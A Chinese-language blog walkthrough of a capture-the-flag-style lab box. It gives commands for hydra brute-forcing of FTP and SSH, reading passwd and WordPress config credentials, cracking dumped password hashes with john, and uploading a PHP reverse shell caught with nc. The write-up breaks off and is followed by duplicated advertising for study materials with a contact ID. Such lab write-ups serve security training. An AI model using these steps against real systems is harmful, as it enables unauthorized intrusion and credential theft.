制作一个字典文件user.txt,用vim编辑器写入内容
再利用hydra工具对FTP服务进行密码爆破:
hydra -L user.txt -e nsr 192.168.47.142 ftp
-L:指定用户名字典
-e:还可再选的选项,n:null,空密码试探 s:使用与用户名一样的密码试探 r:reverse,使用用户名逆转的密码试探
登录ftp,name:elly password:ylle
将passwd文件下载到本地::get passwd
查看一下passwd文件的内容:cat passwd
一行记录对应着一个用户,每行记录有7个字段,分别是
用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录shell
选取出有登录shell权限的用户:
cat passwd | grep -E “/bin/sh|/bin/bash|/bin/zsh” | cut -d : -f 1 |tee sshuser.txt
从 passwd 文件中找出使用 “/bin/sh”、“/bin/bash” 或 “/bin/zsh” 作为登录 shell 的用户,并将这些用户的用户名保存到 “sshuser.txt” 文件中。
用这个用户字典爆破ftp服务,爆破出了SHayslett:SHayslett
登录后发现和elly用户的内容一样
接下来探测22端口的ssh服务
端口22:SSH服务
同样用刚刚的字典爆破ssh服务:hydra -L user2.txt -e nsr 192.168.47.142 ssh
爆破出了SHayslett:SHayslett
获取靶机shell(方法一:ssh远程连接)
ssh连接靶机:ssh SHayslett@192.168.47.142
查看一下当前目录和根目录下的文件,发现https下的一些页面文件
端口80:HTTP服务
访问一下80端口,404页面,没有什么有用信息
端口12380:HTTP服务
访问另一个http服务的12380端口
前面连ssh发现有https目录,使用https访问,发现靶机的web页面
访问之前https目录下发现的几个页面:admin112233、blogblog、announcements
先访问/admin112233
再访问/blogblog,发现一个站,用到的是WordPress开源内容管理系统
重新ssh连接靶机,进入blogblog目录下查看一下有哪些可以利用的文件
查看一下wp-config.php文件内容,发现root用户的账号和密码
连接mysql数据库:mysql -uroot -pplbkac -h 192.168.47.142
执行下面这些命令:
show databases;
use wordpress
show tables;
desc wp_users; //获得关于用户表的更多信息
select user_login,user_pass from wp_users;
最终获得登录用户和密码
密码是加密过的,可以复制出来整理
使用hash-identifier工具,复制任意一个密码看这是什么hash算法加密
P P PBlumbJRRBit7y50Y17.UPJ/xEgv4my0
发现是md5加密
用john工具配合kali自带字典进行爆破:
john --wordlist=/usr/share/wordlists/rockyou.txt sql1.txt
找到登录的页面/wp-login.php,经过尝试,只有一组密码能登入进去
账号:john 密码:incorrect
来到后台页面
在plugins中发现了可以文件上传的地方
获取靶机shell(方法二:文件上传反弹shell脚本)
locate php-reverse-shell.php //查看反弹shell的脚本
cp /usr/share/webshells/php/php-reverse-shell.php . //下载php木马到本地
vim php-reverse-shell.php //用vim编辑器修改里面的内容
把ip修改为kali的ip
复制php文件到桌面上
上传php文件
开启靶机监听:nc -lvp 1234
访问这个目录:https://192.168.47.142:12380/blogblog/wp-content/uploads/
点击刚刚上传的php文件
kali成功监听到该操作,获得靶机shell
提权的部分放到后面再讲
端口139:SMB服务
SMB是一种网络协议,用于在计算机之间共享文件、打印机以及其他资源。SMB协议允许计算机上的不同设备之间进行文件和资源的共享,使得多个计算机可以在网络上协同工作。
使用enum4linux工具枚举Windows和Samba主机中的数据:enum4linux -a 192.168.47.142 | tee smb.txt
这个命令的目的是在给定的目标主机上执行全面的 SMB 枚举,并将结果保存到 smb.txt 文件中。
在结果中发现两个可以连接的共享路径
利用smbclient工具连进SMB服务:smbclient -N //192.168.47.142/tmp,没发现什么有用信息
这个命令的目的是通过 SMB 协议连接到 192.168.47.142 主机上的 /tmp 共享目录,-N表示以匿名方式登录(无密码)。
连接/kathy目录:smbclient -N //192.168.47.142/kathy,也没有发现什么有用信息
端口666:未知服务
对于未知服务,可以尝试用nc去连接:nc 192.168.47.142 666
发现是一个压缩包,并且其中还有一个图片
将数据重定向到本地并解压:nc 192.168.47.142 666 > 666 && unzip 666
通过 nc 命令从远程主机下载数据,并保存到本地文件 666,使用 unzip 命令解压缩名为 666 的文件
得到一张图片
端口3306:MySQL服务
获取靶机shell(方法三:MySQL写马获取shell)
用前面获取到的账号密码连接数据库:mysql -uroot -pplbkac -h 192.168.47.142
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-tThfEuuV-1712764213770)]